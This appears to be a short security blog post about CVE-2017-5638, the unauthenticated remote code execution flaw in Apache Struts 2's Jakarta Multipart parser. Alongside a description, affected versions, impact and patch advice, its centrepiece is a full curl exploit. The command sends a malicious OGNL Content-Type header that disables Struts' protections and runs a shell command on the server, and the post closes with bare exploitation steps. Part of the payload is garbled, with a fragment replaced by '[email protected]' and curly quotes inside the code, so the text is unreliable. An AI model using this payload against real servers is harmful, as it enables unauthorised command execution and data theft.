Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in a file upload request, the parser incorrectly processes it, attempting to evaluate the header’s value as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language integrated with Struts that can execute Java code and access the application’s context. An attacker can craft a Content-Type header containing a malicious OGNL expression. Because the parser fails to properly sanitize this input, the expression is interpreted and executed on the server side. This allows the attacker to achieve remote code execution with the same privileges as the Struts application server, enabling them to run arbitrary system commands, exfiltrate data, or gain complete control over the vulnerable system. The attack is particularly dangerous as it does not require authentication and can be performed over the network.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-server.com/struts2-blank/example/Upload.action`
How Exploit:
Craft malicious Content-Type header.
Send HTTP file upload request.
OGNL expression server-side execution.
Arbitrary command injection.
Protection from this CVE
Apply vendor patch immediately.
Upgrade to Struts 2.3.32 or 2.5.10.1.
Implement WAF filtering rules.
Sanitize all file upload headers.
Impact:
Complete system compromise.
Unauthenticated remote code execution.
Data breach and theft.
Full application control.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
